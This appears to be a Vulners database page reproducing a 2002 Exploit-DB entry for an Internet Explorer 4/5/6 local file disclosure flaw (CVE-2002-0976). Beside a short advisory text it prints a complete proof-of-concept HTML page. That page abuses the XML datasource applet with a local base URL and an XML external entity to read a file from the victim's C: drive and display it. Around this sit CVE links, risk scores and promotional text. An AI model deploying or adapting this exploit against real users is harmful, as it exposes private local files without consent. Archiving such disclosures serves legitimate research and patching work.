Lucene search
+L

Microsoft Internet Explorer 4/5/6 - XML Datasource Applet File Disclosure

🗓️ 17 Aug 2002 00:00:00Reported by JelmerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 43 Views

Microsoft Internet Explorer may leak sensitive file information via a datasource applet exploit.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-0976
23 Aug 200204:00
cve
cvelist
Cvelist
CVE-2002-0976
23 Aug 200204:00
cvelist
nvd
NVD
CVE-2002-0976
24 Sep 200204:00
nvd
source: https://www.securityfocus.com/bid/5490/info

A problem in Microsoft Internet Explorer could lead to the disclosure of sensitive information.

Due to the design of the datasource applet, it may be possible for a user to view the contents of local files via a remote page. By building a custom-crafted page that specifies the code base as the local system, it would be possible to display the contents of known local files.

<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.4
EPSS0.14303
43